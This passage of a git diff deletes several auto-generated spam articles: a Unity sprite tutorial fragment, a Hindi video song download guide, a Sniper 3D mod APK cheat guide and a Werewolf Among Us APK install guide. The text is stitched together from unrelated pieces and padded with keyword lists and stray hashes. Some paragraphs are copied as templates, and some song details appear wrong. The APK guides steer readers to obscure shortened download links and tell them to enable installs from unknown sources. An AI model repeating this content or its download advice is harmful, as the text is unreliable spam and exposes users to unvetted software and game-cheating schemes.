    -Download 2d sprite package unity for platformer games
    -Unity 2d sprite outline and glow shaders
    -Generate and modify 2d sprite meshes in unity
    -Unity 2d sprite flipbook and frame animation
    -Download 2d sprite package unity for RPG games
    -Unity 2d sprite deformation and distortion effects
    -Apply and change 2d sprite materials in unity
    -Unity 2d sprite blending and color grading
    -Download 2d sprite package unity for UI elements
    -Unity 2d sprite slicing and trimming tools
    -Add and remove 2d sprite components in unity
    -Unity 2d sprite rotation and scaling methods

    -

    How to Optimize Sprites with Sprite Atlas

    -

    A Sprite Atlas is an asset that combines multiple sprites into a single texture. This can improve your game's performance and memory usage by reducing draw calls and texture swaps. To create a Sprite Atlas, right-click in the Assets window of your project and go to Create > Sprite Atlas. You can then drag and drop sprites from your Assets window to the Objects for Packing section in the Inspector window. You can also adjust some settings such as padding, packing mode, compression, etc. To pack your sprites into an atlas, click on the Pack Preview button. You can then see how your atlas looks like and how much space it occupies.

    -

    To use your Sprite Atlas in your game, you need to enable Sprite Atlas Variants, which are copies of your atlas with different resolutions for different platforms. To enable Sprite Atlas Variants, go to Edit > Project Settings > Editor > Sprite Packer Mode > Always Enabled. Then, go to Edit > Project Settings > Quality > Default > Texture Quality > Full Res. This will ensure that your game uses the highest resolution atlas available for your platform.

    -

    Conclusion

    -

    In this article, we have learned how to download and import 2D sprite package in Unity, and how to use some of its features to enhance your 2D graphics. We have covered how to create and edit sprites and sprite shapes, how to sort sprites and use sorting groups, how to apply 9-slicing and sprite masks, and how to optimize sprites with sprite atlas. With these tools, you can create amazing 2D environments for your games that are both visually appealing and performant.

    -

    If you want to learn more about the 2D sprite package and its features, you can check out the following resources:

    - -

    FAQs

    -

    What are the benefits of using 2D sprite package?

    -

    Some of the benefits of using 2D sprite package are:

    -
      -
    • You can create and edit sprites and sprite shapes easily and intuitively.
    • -
    • You can use sprite shapes to create free-form shapes that fit your game world.
    • -
    • You can sort sprites and use sorting groups to control their rendering order.
    • -
    • You can apply 9-slicing and sprite masks to resize and mask sprites without distortion.
    • -
    • You can optimize sprites with sprite atlas to reduce draw calls and texture swaps.
    • -
    -

    How can I animate sprites with 2D animation package?

    -

    To animate sprites with 2D animation package, you need to install the package from the Package Manager. Then, you can use the Sprite Skin component to add bones and weights to your sprite. You can also use the Sprite Resolver component to swap sprites during animation. To create animations, you can use the Animation Window or the Dopesheet Window. You can also use the Animator Controller to control the transitions between animations.

    -

    How can I create tilemaps with 2D tilemap package?

    -

    To create tilemaps with 2D tilemap package, you need to install the package from the Package Manager. Then, you can create a Tilemap game object, which is a game object that has a Tilemap component and a Tilemap Renderer component attached to it. You can also create a Tile Palette, which is a window that lets you paint tiles on your tilemap. To create tiles, you can use the Tile Asset, which is an asset that defines and stores information about a particular type of tile. You can also use the Rule Tile Asset, which is an asset that defines rules for how tiles behave based on their neighbors.

    -

    How can I edit sprites in the Sprite Editor?

    -

    To edit sprites in the Sprite Editor, you need to select your sprite in the Assets window and click on the Edit button in the Inspector window. This will open the Sprite Editor window, where you can edit various properties of your sprite. Some of the things you can do in the Sprite Editor are:

    -
      -
    • Slice your sprite into multiple sub-sprites.
    • -
    • Apply 9-slicing to your sprite.
    • -
    • Create custom physics shapes for your sprite.
    • -
    • Create secondary textures for your sprite.
    • -
    • Create custom pivot points for your sprite.
    • -
    -

    How can I create custom shapes with Sprite Shape Renderer?

    -

    To create custom shapes with Sprite Shape Renderer, you need to create a Sprite Shape Profile and assign sprites to it. Then, you need to create a Sprite Shape game object and edit its spline path in the scene. You can also adjust some settings in the Sprite Shape Renderer component, such as fill texture, color, material, etc. You can also use scripts to modify your shape at runtime.

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Download the Latest Hindi Video Songs of 2020 in High Quality.md b/spaces/congsaPfin/Manga-OCR/logs/Download the Latest Hindi Video Songs of 2020 in High Quality.md deleted file mode 100644 index 3da194e4912b8ee2a46b0d3237a682daa1498180..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Download the Latest Hindi Video Songs of 2020 in High Quality.md +++ /dev/null @@ -1,122 +0,0 @@ - -

    Hindi Video Songs Download 2020: How to Enjoy the Latest Bollywood Hits

    -

    Introduction

    -

    If you are a fan of Hindi music, you must be looking for the best ways to download and enjoy the latest Hindi video songs of 2020. Hindi video songs are not only catchy and melodious, but also showcase the rich culture and diversity of India. Whether you want to groove to the beats of a dance number, feel the emotions of a romantic song, or get inspired by a patriotic song, there is something for everyone in Hindi video songs.

    -

    hindi video songs download 2020


    DOWNLOADhttps://urlca.com/2uOcFP



    -

    But how can you download and watch the latest Hindi video songs of 2020? What are the best sources to find them? How can you make sure that you are getting high-quality videos and not pirated ones? In this article, we will answer all these questions and more. We will also give you some tips on how to enjoy the latest Bollywood hits to the fullest.

    -

    Why Download Hindi Video Songs?

    -

    There are many reasons why you might want to download Hindi video songs instead of streaming them online. Some of them are:

    -
      -
    • You can watch them offline anytime and anywhere, without worrying about internet connectivity or data charges.
    • -
    • You can save them on your device or external storage and create your own playlist of your favorite songs.
    • -
    • You can share them with your friends and family via Bluetooth, WhatsApp, or other apps.
    • -
    • You can watch them on a bigger screen, such as your TV or laptop, for a better viewing experience.
    • -
    • You can avoid annoying ads and pop-ups that interrupt your streaming.
    • -
    -

    How to Download Hindi Video Songs?

    -

    There are many ways to download Hindi video songs, but not all of them are legal and safe. Some websites and apps may offer free downloads, but they may also contain viruses, malware, or spyware that can harm your device or compromise your privacy. Some may also violate the copyright laws and infringe on the rights of the artists and producers.

    -

    hindi video songs download 2020 free
    -hindi video songs download 2020 mp4
    -hindi video songs download 2020 hd
    -hindi video songs download 2020 new
    -hindi video songs download 2020 pagalworld
    -hindi video songs download 2020 dj
    -hindi video songs download 2020 jiosaavn
    -hindi video songs download 2020 wynk
    -hindi video songs download 2020 spotify
    -hindi video songs download 2020 garmi
    -hindi video songs download 2020 taaron ke shehar
    -hindi video songs download 2020 meri aashiqui
    -hindi video songs download 2020 malang
    -hindi video songs download 2020 dil tod ke
    -hindi video songs download 2020 genda phool
    -hindi video songs download 2020 dil chahte ho
    -hindi video songs download 2020 laal chunariya
    -hindi video songs download 2020 shayad
    -hindi video songs download 2020 bhula dunga
    -hindi video songs download 2020 lagdi lahore di
    -hindi video songs download 2020 haan main galat
    -hindi video songs download 2020 chal ghar chalen
    -hindi video songs download 2020 goa beach
    -hindi video songs download 2020 aaj bhi
    -hindi video songs download 2020 bheegi bheegi
    -hindi video songs download 2020 jinke liye
    -hindi video songs download 2020 baarish
    -hindi video songs download 2020 naach meri rani
    -hindi video songs download 2020 burjkhalifa
    -hindi video songs download 2020 sawan mein lag gayi aag
    -best hindi video songs download 2020
    -latest hindi video songs download 2020
    -top hindi video songs download 2020
    -romantic hindi video songs download 2020
    -sad hindi video songs download 2020
    -dance hits hindi video songs download 2020
    -popular hits hindi video songs download 2020
    -bollywood top 50 hindi video songs download 2020
    -bollywood hits 2020 hindi video songs download
    -latest bollywood songs hindi video songs download 2020

    -

    Therefore, it is important to download Hindi video songs from reliable and authorized sources that respect the law and the creators. Here are some of the best options to download Hindi video songs legally and safely:

    -

    JioSaavn

    -

    JioSaavn is one of the most popular music streaming platforms in India, offering over 55 million songs in various languages, genres, and moods. You can also download Hindi video songs from JioSaavn by subscribing to their Pro plan, which costs Rs. 99 per month or Rs. 399 per year. With JioSaavn Pro, you can download unlimited songs and videos in high quality (up to 320 kbps) and enjoy them offline without ads. You can also access exclusive content and podcasts from JioSaavn Originals.

    -

    To download Hindi video songs from JioSaavn, you need to install the app on your Android or iOS device and sign up for a Pro account. Then, you can browse through their curated playlists or search for your favorite songs by name, artist, album, or genre. You can also use their smart recommendations based on your listening history and preferences. Once you find a song that you want to download, just tap on the download icon next to it and it will be saved on your device. You can also create your own playlists and download them in one go.

    -

    Wynk Music

    -

    Wynk Music is another popular music streaming platform in India, offering over 6 million songs in various languages, genres, and moods. You can also download Hindi video songs from Wynk Music by subscribing to their Premium plan, which costs Rs. 99 per month or Rs. 399 per year. With Wynk Premium, you can download unlimited songs and videos in high quality (up to 320 kbps) and enjoy them offline without ads. You can also access exclusive content and podcasts from Wynk Originals.

    -

    To download Hindi video songs from Wynk Music, you need to install the app on your Android or iOS device and sign up for a Premium account. Then, you can browse through their curated playlists or search for your favorite songs by name, artist, album, or genre. You can also use their smart recommendations based on your listening history and preferences. Once you find a song that you want to download, just tap on the download icon next to it and it will be saved on your device. You can also create your own playlists and download them in one go.

    -

    Songdew

    -

    Songdew is

    Songdew is a unique music platform that connects independent artists and music lovers. You can also download Hindi video songs from Songdew by subscribing to their Plus plan, which costs Rs. 99 per month or Rs. 999 per year. With Songdew Plus, you can download unlimited songs and videos in high quality (up to 320 kbps) and enjoy them offline without ads. You can also access exclusive content and podcasts from Songdew Originals.

    -

    To download Hindi video songs from Songdew, you need to install the app on your Android or iOS device and sign up for a Plus account. Then, you can browse through their curated playlists or search for your favorite songs by name, artist, album, or genre. You can also use their smart recommendations based on your listening history and preferences. Once you find a song that you want to download, just tap on the download icon next to it and it will be saved on your device. You can also create your own playlists and download them in one go.

    -

    YouTube

    -

    YouTube is the most popular video-sharing platform in the world, offering billions of videos in various languages, genres, and moods. You can also download Hindi video songs from YouTube by using a third-party app or website that allows you to convert YouTube videos into MP3 or MP4 files. However, this method is not legal and safe, as it violates the terms of service of YouTube and may expose you to viruses, malware, or spyware. Moreover, the quality of the downloaded videos may not be optimal and you may not get the full lyrics or subtitles.

    -

    To download Hindi video songs from YouTube legally and safely, you need to subscribe to YouTube Premium, which costs Rs. 129 per month or Rs. 399 per quarter. With YouTube Premium, you can download unlimited videos in high quality (up to 1080p) and enjoy them offline without ads. You can also access exclusive content and podcasts from YouTube Originals.

    -

    To download Hindi video songs from YouTube Premium, you need to install the app on your Android or iOS device and sign up for a Premium account. Then, you can browse through their curated playlists or search for your favorite songs by name, artist, album, or genre. You can also use their smart recommendations based on your watching history and preferences. Once you find a song that you want to download, just tap on the download icon next to it and it will be saved on your device. You can also create your own playlists and download them in one go.

    -

    How to Enjoy Hindi Video Songs?

    -

    Downloading Hindi video songs is not enough to enjoy them fully. You also need to have a good device, a good sound system, and a good mood to appreciate the beauty and charm of Hindi music. Here are some tips on how to enjoy Hindi video songs to the fullest:

    -

    Choose a Good Device

    -

    The device that you use to watch Hindi video songs should have a good display, a good battery life, and a good storage capacity. You should also make sure that it is compatible with the app or website that you use to download the songs. Some of the best devices to watch Hindi video songs are:

    - - - - - - -
    DeviceFeatures
    Samsung Galaxy S21 Ultra- 6.8-inch Dynamic AMOLED 2X display with 120Hz refresh rate
    - 5,000 mAh battery with fast charging and wireless charging
    - 128GB/256GB/512GB internal storage with microSD card slot
    - Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps
    Apple iPhone 12 Pro Max- 6.7-inch OLED display with 60Hz refresh rate
    - 3,687 mAh battery with fast charging and wireless charging
    - 128GB/256GB/512GB internal storage without microSD card slot
    - Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps
    OnePlus 9 Pro- 6.7-inch Fluid AMOLED display with 120Hz refresh rate
    - 4,500 mAh battery with fast charging and wireless charging
    - 128GB/256GB internal storage without microSD card slot
    - Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps
    Xiaomi Mi 11 Ultra- 6.81-inch AMOLED display with 120Hz refresh rate
    - 5,000 mAh battery with fast charging and wireless charging
    - 256GB/512GB internal storage without microSD card slot
    - Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps
    -

    Choose a Good Sound System

    -

    The sound system that you use to listen to Hindi video songs should have a good sound quality, a good volume range, and a good connectivity. You should also make sure that it is compatible with the device that you use to watch the songs. Some of the best sound systems to listen to Hindi video songs are:

    - - - - - - -
    Sound SystemFeatures
    Bose Home Speaker 500- Wireless smart speaker with built-in voice assistants
    - Stereo sound with two custom drivers
    - Touch controls and LCD display
    - Wi-Fi and Bluetooth connectivity
    - Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps
    Sony HT-X8500 Soundbar- Wireless soundbar with built-in subwoofer
    - Dolby Atmos and DTS:X surround sound
    - HDMI ARC and optical input
    - Bluetooth connectivity
    - Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps
    JBL Flip 5 Bluetooth Speaker- Wireless portable speaker with IPX7 waterproof rating
    - Stereo sound with dual passive radiators
    - 12 hours of playtime with 4,800 mAh battery
    - USB-C charging port
    - Bluetooth connectivity
    - Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps
    Boat Stone 200 Bluetooth Speaker- Wireless portable speaker with IPX6 water and dust resistant rating
    - Mono sound with 50 mm driver
    - 10 hours of playtime with 1,500 mAh battery
    - Micro USB charging port
    - Bluetooth connectivity
    - Supports JioSaavn, Wynk Music, Songdew, and YouTube Premium apps
    -

    Choose a Good Mood

    -

    The mood that you are in when you watch Hindi video songs can also affect your enjoyment of them. You should choose songs that match your mood or help you change your mood for the better. Here are some tips on how to choose songs based on your mood:

    -
      -
    • If you are feeling happy and energetic, you can choose upbeat and lively songs that make you want to dance and sing along. Some examples are: Badtameez Dil from Yeh Jawaani Hai Deewani, Ghungroo from War, Makhna from Drive, and Garmi from Street Dancer 3D.
    • -
    • If you are feeling sad and depressed, you can choose soothing and emotional songs that make you feel comforted and understood. Some examples are: Tum Hi Ho from Aashiqui 2, Kabira from Yeh Jawaani Hai Deewani, Tu Hi Yaar Mera from Pati Patni Aur Woh, and Tere Bina from SIMMBA.
    • -
    • If you are feeling angry and frustrated, you can choose powerful and rebellious songs that make you feel empowered and motivated. Some examples are: Zinda Hai Toh from Bhaag Milkha Bhaag, Kar Har Maidaan Fateh from Sanju, Bekhayali from Kabir Singh, and Genda Phool by Badshah.
    • -
    • If you are feeling romantic and in love, you can choose sweet and sensual songs that make you feel closer to your partner. Some examples are: Tum Se Hi from Jab We Met, Pehla Nasha from Jo Jeeta Wohi Sikandar, Tum Hi Ho Bandhu from Cocktail, and Dil Diyan Gallan from Tiger Zinda Hai.
    • -
    • If you are feeling patriotic and proud, you can choose inspiring and uplifting songs that make you feel connected to your country. Some examples are: Vande Mataram from Lagaan< /em>, Chak De India from Chak De India, Ae Watan from Raazi, and Teri Mitti from Kesari.
    • -
    -

    Conclusion

    -

    Hindi video songs are a great way to enjoy the latest Bollywood hits and experience the diversity and richness of Indian culture. However, to download and watch them, you need to use reliable and authorized sources that offer high-quality videos and respect the law and the creators. You also need to have a good device, a good sound system, and a good mood to appreciate the beauty and charm of Hindi music. We hope that this article has helped you find the best ways to download and enjoy Hindi video songs of 2020.

    -

    FAQs

    -

    Q: What are some of the best Hindi video songs of 2020?

    -

    A: Some of the best Hindi video songs of 2020 are:

    -
      -
    • Shayad from Love Aaj Kal
    • -
    • Ghoomar from Padmaavat
    • -
    • Dus Bahane 2.0 from Baaghi 3
    • -
    • Muqabla from Street Dancer 3D
    • -
    • Malang from Malang
    • -
    -

    Q: How can I download Hindi video songs for free?

    -

    A: You can download Hindi video songs for free by using some websites or apps that offer free downloads, but they may not be legal and safe. They may also have poor quality videos and may not have the full lyrics or subtitles. It is better to use paid sources that offer high-quality videos and respect the law and the creators.

    -

    Q: How can I watch Hindi video songs on my TV?

    -

    A: You can watch Hindi video songs on your TV by using a device that supports HDMI or Chromecast. You can connect your device to your TV using an HDMI cable or a Chromecast dongle and then stream or play the downloaded videos on your device. You can also use a smart TV that has built-in apps for music streaming platforms.

    -

    Q: How can I learn the lyrics of Hindi video songs?

    -

    A: You can learn the lyrics of Hindi video songs by using some apps or websites that provide lyrics along with the videos. Some examples are Musixmatch, Lyricsmint, Gaana, and Hungama. You can also use some apps or websites that provide translations or transliterations of the lyrics in English or other languages. Some examples are Shabdkosh, LyricsTranslate, and Lyricstranslate.

    -

    Q: How can I discover new Hindi video songs?

    -

    A: You can discover new Hindi video songs by using some apps or websites that provide curated playlists or recommendations based on your listening history and preferences. Some examples are JioSaavn, Wynk Music, Songdew, and YouTube Premium. You can also follow some blogs or social media accounts that review or share new Hindi video songs. Some examples are Bollywood Hungama, Filmfare, Koimoi, and MissMalini.

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Sniper 3D Mod Apk Get Unlimited Money and Diamonds for Free.md b/spaces/congsaPfin/Manga-OCR/logs/Sniper 3D Mod Apk Get Unlimited Money and Diamonds for Free.md deleted file mode 100644 index f7ea07ac55b4153cf28eee7168d7a7e4086ee01b..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Sniper 3D Mod Apk Get Unlimited Money and Diamonds for Free.md +++ /dev/null @@ -1,126 +0,0 @@ -
    -

    Sniper 3D: How to Get Unlimited Coins and Diamonds with Mod APK

    -

    If you are a fan of shooting games, you might have heard of Sniper 3D, one of the most popular sniper games on mobile devices. In this game, you can take on hundreds of thrilling missions as a professional sniper, using a variety of guns and gadgets. You can also compete with other players in real-time multiplayer modes, or join a squad and participate in team battles.

    -

    sniper 3d unlimited coins and diamonds mod apk download


    Download Zip > https://urlca.com/2uOfcM



    -

    However, to enjoy the full potential of Sniper 3D, you will need a lot of coins and diamonds. These are the in-game currencies that allow you to buy new weapons, upgrade your equipment, unlock special items, and more. Unfortunately, earning coins and diamonds in Sniper 3D can be quite slow and tedious, especially if you don't want to spend real money on microtransactions.

    -

    That's why some players resort to using mod APKs to get unlimited coins and diamonds in Sniper 3D. A mod APK is a modified version of the original game file that has been altered to give you access to features that are normally locked or restricted. By using a mod APK, you can bypass the game's limitations and enjoy unlimited resources without spending a dime.

    -

    How to Download and Install Sniper 3D Mod APK

    -

    If you want to try using a mod APK for Sniper 3D, you will need to follow these steps:

    -
      -
    1. Find a reliable source for the mod APK file. There are many websites that claim to offer mod APKs for Sniper 3D, but not all of them are trustworthy. Some of them may contain malware, viruses, or outdated versions that don't work. To avoid these risks, you should do some research before downloading any file from an unknown source. You can check reviews, ratings, comments, or feedback from other users to verify the quality and safety of the mod APK file.
    2. -
    3. Enable unknown sources on your device. Since mod APKs are not from the official Google Play Store or App Store, you will need to allow your device to install apps from unknown sources. To do this, go to your device's settings, then security or privacy, then enable unknown sources or allow installation from unknown sources. This may vary depending on your device model and operating system.
    4. -
    5. Install the mod APK file and grant permissions. Once you have downloaded the mod APK file from a reliable source and enabled unknown sources on your device, you can proceed to install it. Locate the file in your device's storage or download folder, then tap on it to start the installation process. You may need to grant some permissions for the app to access your device's features or data. Follow the instructions on the screen until the installation is complete.
    6. -
    -

    How to Use Sniper 3D Mod APK

    -

    After installing the mod APK for Sniper 3D, you can start using it by following these steps:

    -
  • Access the mod menu and customize your settings. When you launch the game, you should see a mod menu icon on the screen. Tap on it to open the mod menu, where you can adjust various settings and options for the mod APK. For example, you can enable or disable unlimited coins and diamonds, auto-aim, wallhack, god mode, and more. You can also change the values of the coins and diamonds to your desired amount. Be careful not to set them too high, as this may cause the game to crash or detect your cheating.
  • -
  • Enjoy unlimited coins and diamonds in the game. Once you have configured your mod menu settings, you can start playing the game as usual. You should see that your coins and diamonds are unlimited or increased to the amount you set. You can use them to buy new weapons, upgrade your equipment, unlock special items, and more. You can also access premium features that are normally paid or require a subscription, such as VIP mode, exclusive weapons, etc.
  • -
  • Avoid bans and other risks. While using a mod APK for Sniper 3D can be fun and convenient, it also comes with some risks. The game developers may detect your cheating and ban your account or device from playing the game. You may also face legal issues if you violate the game's terms of service or infringe on the intellectual property rights of the game creators. Moreover, you may ruin the game's balance and fairness for other players who play legitimately. To avoid these risks, you should use the mod APK sparingly and responsibly. You should also avoid using it in online multiplayer modes or leaderboards, as this may attract attention and suspicion from other players or moderators.
  • - -

    Pros and Cons of Sniper 3D Mod APK

    -

    Using a mod APK for Sniper 3D has its pros and cons. Here are some of them:

    -

    sniper 3d mod apk free download unlimited money and gems
    -sniper 3d hack apk latest version with unlimited diamonds and coins
    -sniper 3d mod apk android 1 unlimited everything
    -sniper 3d assassin mod apk offline unlimited gold and cash
    -sniper 3d gun shooter mod apk unlimited energy and diamonds
    -sniper 3d mod apk rexdl with unlimited coins and gems
    -sniper 3d fun free online fps shooting game mod apk unlimited money and diamonds
    -sniper 3d pvp mode mod apk unlimited ammo and coins
    -sniper 3d mod apk happymod with unlimited diamonds and gems
    -sniper 3d mod apk revdl unlimited money and gold
    -sniper 3d assassin gun shooter mod apk unlimited coins and diamonds
    -sniper 3d mod apk ios download with unlimited gems and cash
    -sniper 3d mod apk no root unlimited money and diamonds
    -sniper 3d hack online generator for unlimited coins and gems
    -sniper 3d mod menu apk download with unlimited diamonds and money
    -sniper 3d mod apk obb unlimited coins and gems
    -sniper 3d world ops mod apk unlimited money and diamonds
    -sniper 3d hack version download with unlimited coins and gems
    -sniper 3d mod apk all guns unlocked unlimited money and diamonds
    -sniper 3d mod apk pure with unlimited coins and gems
    -sniper 3d cheats for android free download unlimited money and diamonds
    -sniper 3d mod apk old version with unlimited coins and gems
    -sniper 3d hack tool download for pc unlimited money and diamonds
    -sniper 3d mod apk new update with unlimited coins and gems
    -sniper 3d cracked apk download with unlimited money and diamonds
    -sniper 3d premium mod apk unlimited coins and gems
    -sniper 3d hack without human verification for unlimited coins and diamonds
    -sniper 3d mod apk vip unlocked with unlimited money and gems
    -sniper 3d hack app download for android unlimited coins and diamonds
    -sniper 3d mod apk blackmod with unlimited money and gems
    -sniper 3d hack ios no jailbreak for unlimited coins and diamonds
    -sniper 3d mod apk mediafıre download with unlimited money and gems
    -sniper 3d hack online without survey for unlimited coins and diamonds
    -sniper 3d mod apk platinmods with unlimited money and gems
    -sniper 3d hack game download for android unlimited coins and diamonds
    -sniper 3d mod apk latest version offline with unlimited money and gems
    -sniper 3d hack no root for android for unlimited coins and diamonds
    -sniper 3d mod apk an1 with unlimited money and gems
    -sniper 3d hack apk ios download with unlimited coins and diamonds
    -sniper 3d mod apk apkpure download with unlimited money and gems
    -sniper 3d hack online free for android for unlimited coins and diamonds
    -sniper 3d mod apk all regions unlocked with unlimited money and gems
    -sniper 3d hack version free download for android with unlimited coins and diamonds
    -sniper 3d mod apk no ads with unlimited money and gems
    -sniper 3d hack iosgods for iphone for unlimited coins and diamonds
    -sniper 3d mod apk lenov.ru with unlimited money and gems
    -sniper 3d hack lucky patcher for android for unlimited coins and diamonds
    -sniper 3d mod apk mob.org with unlimited money and gems
    -sniper 3d hack online generator no human verification for unlimited coins and diamonds

    - - - - - - - - - - - - - - - - - - - - - -
    ProsCons
    You can save time and money by getting unlimited coins and diamonds without spending real money or grinding for hours.You may expose your device to malware, viruses, or other harmful software that may damage your device or steal your personal information.
    You can unlock premium features that are normally locked or require a subscription, such as VIP mode, exclusive weapons, etc.You may violate the game's terms of service or infringe on the intellectual property rights of the game creators, which may result in legal action or penalties.
    You can have more fun and freedom by customizing your gameplay experience with various mod options, such as auto-aim, wallhack, god mode, etc.You may ruin the game's balance and fairness for other players who play legitimately, which may cause frustration or resentment among the gaming community.
    You can explore new aspects of the game that are normally hidden or inaccessible, such as secret missions, hidden locations, etc.You may lose interest or challenge in the game by making it too easy or boring with unlimited resources or cheats.
    -

    Conclusion

    -

    In conclusion, using a mod APK for Sniper 3D can be a tempting option for players who want to get unlimited coins and diamonds in the game. However, it also comes with some risks and drawbacks that should be considered before downloading and installing any file from an unknown source. Personally, I would not recommend using a mod APK for Sniper 3D, as I think it takes away the fun and thrill of playing a sniper game. I prefer to play the game legitimately and earn my coins and diamonds through hard work and skill. However, if you decide to use a mod APK for Sniper 3D, you should do so at your own risk and responsibility.

    -

    If you enjoyed this article, please share it with your friends who play Sniper 3D. You can also leave a comment below and let me know what you think about using a mod APK for Sniper 3D. Do you use it or not? Why or why not? I would love to hear your opinions and feedback.

    -

    FAQs

    -

    Here are some frequently asked questions and answers related to using a mod APK for Sniper 3D:

    -

    Q: Is using a mod APK for Sniper 3D illegal?

    -

    A: Using a mod APK for Sniper 3D is not illegal per se, but it may violate the game's terms of service or infringe on the intellectual property rights of the game creators. This may result in legal action or penalties from the game developers or authorities.

    -

    Q: Is using a mod APK for Sniper 3D safe?

    -

    A: Using a A: Using a mod APK for Sniper 3D is not safe, as you may expose your device to malware, viruses, or other harmful software that may damage your device or steal your personal information. You may also risk getting banned or suspended from the game if the game developers detect your cheating. You should always be careful and cautious when downloading and installing any file from an unknown source.

    Q: How can I get coins and diamonds in Sniper 3D without using a mod APK?

    -

    A: There are several ways to get coins and diamonds in Sniper 3D without using a mod APK. Some of them are:

    -
      -
    • Completing missions and challenges. You can earn coins and diamonds by completing various missions and challenges in the game. The more difficult the mission or challenge, the more rewards you will get.
    • -
    • Watching ads and videos. You can watch ads and videos in the game to get free coins and diamonds. However, this may be annoying and time-consuming, as you will have to watch a lot of ads and videos to get a decent amount of resources.
    • -
    • Participating in events and tournaments. You can participate in various events and tournaments in the game to win coins and diamonds. These events and tournaments are usually limited-time or seasonal, so you should check the game regularly for updates and announcements.
    • -
    • Purchasing with real money. You can purchase coins and diamonds with real money through the game's store or in-app purchases. This is the fastest and easiest way to get resources, but it can also be very expensive and addictive.
    • -
    -

    Q: What are some alternatives to Sniper 3D mod APK?

    -

    A: If you are looking for some alternatives to Sniper 3D mod APK, you can try these other sniper games that are similar or better than Sniper 3D:

    -
      -
    • Hitman Sniper. This is a sniper game based on the Hitman franchise, where you play as Agent 47, a professional assassin. You can use various weapons, gadgets, and strategies to eliminate your targets in different locations and scenarios.
    • -
    • Sniper Fury. This is a sniper game that features stunning graphics, realistic physics, and intense action. You can join a squad and fight against other players in real-time multiplayer modes, or take on solo missions and challenges.
    • -
    • Sniper Arena. This is a sniper game that focuses on online PvP battles, where you can compete with other snipers from around the world. You can customize your weapons, gear, and skills, and climb the ranks of the leaderboard.
    • -
    -

    Q: How can I improve my skills in Sniper 3D?

    -

    A: If you want to improve your skills in Sniper 3D, you can follow these tips:

    -
      -
    • Practice regularly. The best way to improve your skills in Sniper 3D is to practice regularly and learn from your mistakes. You can play different modes and levels to test your abilities and challenge yourself.
    • -
    • Upgrade your weapons and equipment. You can upgrade your weapons and equipment to increase their performance and efficiency. You can also unlock new weapons and equipment that suit your playstyle and preferences.
    • -
    • Use the right weapon for the right situation. You can use different weapons for different situations, depending on the distance, accuracy, damage, rate of fire, etc. You should also use the appropriate scope, silencer, magazine, etc., for each weapon.
    • -
    • Use the environment to your advantage. You can use the environment to your advantage by finding cover, hiding spots, vantage points, etc. You can also use environmental objects or elements to distract or eliminate your enemies.
    • -
    -

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Werewolf Among Us APK A Fun and Challenging Game for Friends.md b/spaces/congsaPfin/Manga-OCR/logs/Werewolf Among Us APK A Fun and Challenging Game for Friends.md deleted file mode 100644 index cc986ae6c6e23d5ef0422607b536f0f3096c38dd..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Werewolf Among Us APK A Fun and Challenging Game for Friends.md +++ /dev/null @@ -1,155 +0,0 @@ - -

    Werewolf Among Us APK: A Social Game of Deception and Survival

    -

    Do you love playing social games that test your skills of deduction, deception, and communication? Do you enjoy being part of a team that has to work together to find the impostor among them? Do you like having fun with your friends online while playing a game that is thrilling, challenging, and entertaining? If you answered yes to any of these questions, then you might want to try Werewolf Among Us APK, a game that is inspired by the popular game Among Us and the classic party game Werewolf.

    -

    What is Werewolf Among Us APK?

    -

    Werewolf Among Us APK is an Android application that allows you to play a game of Werewolf with other players online. Werewolf is a game where a group of players are divided into two teams: the werewolves, who know each other and try to kill the other players, and the villagers, who do not know each other and try to find and eliminate the werewolves. Some players also have special roles that give them unique abilities or information. The game is divided into day and night phases, where different actions can be taken by different roles. The game ends when either all the werewolves are dead or the werewolves outnumber the villagers.

    -

    werewolf among us apk


    Download Ziphttps://urlca.com/2uOfUI



    -

    The gameplay of Werewolf Among Us APK

    -

    The gameplay of Werewolf Among Us APK is similar to the original Werewolf game, but with some differences. For example:

    -
      -
    • The game can be played with 4 to 16 players.
    • -
    • The game can be customized with different settings, such as the number of werewolves, the duration of each phase, the voting system, etc.
    • -
    • The game can be played in different modes, such as classic mode, couple mode, or custom mode.
    • -
    • The game can be played in different languages, such as English, Chinese, Japanese, etc.
    • -
    • The game can be played with voice chat or text chat.
    • -
    • The game can be played with friends or strangers.
    • -
    -

    The features of Werewolf Among Us APK

    -

    Werewolf Among Us APK has many features that make it an enjoyable and engaging game. Some of these features are:

    -
      -
    • The game has high-quality graphics and sound effects that create a realistic and immersive atmosphere.
    • -
    • The game has a variety of roles that have different skills and functions that add complexity and diversity to the game.
    • -
    • The game has a ranking system that tracks your performance and progress in the game.
    • -
    • The game has a social aspect that allows you to chat with other players, make friends, join groups, send gifts, etc.
    • -
    • The game has regular updates that add new features and fix bugs.
    • -
    -

    How to download and install Werewolf Among Us APK?

    -

    If you want to play Werewolf Among Us APK, you need to download and install it on your Android device. Here are the requirements and steps for doing so:

    -

    The requirements for Werewolf Among Us APK

    -

    To download and install Werewolf Among Us APK, you need to have:

    -
      -
    • An Android device that runs on Android 4.4 or higher.
    • -
    • A stable internet connection.
    • -
    • Enough storage space on your device.
    • -
    • A permission to install apps from unknown sources. You can enable this by going to your device settings, security, and allowing unknown sources.
    • -
    -

    The steps for downloading and installing Werewolf Among Us APK

    -

    To download and install Werewolf Among Us APK, you need to follow these steps:

    -
      -
    1. Go to the official website of Werewolf Among Us APK or any other trusted source that provides the download link for the game.
    2. -
    3. Click on the download button and wait for the file to be downloaded on your device.
    4. -
    5. Locate the downloaded file on your device and tap on it to start the installation process.
    6. -
    7. Follow the instructions on the screen and agree to the terms and conditions of the game.
    8. -
    9. Wait for the installation to be completed and launch the game from your app drawer or home screen.
    10. -
    -

    How to play Werewolf Among Us APK?

    -

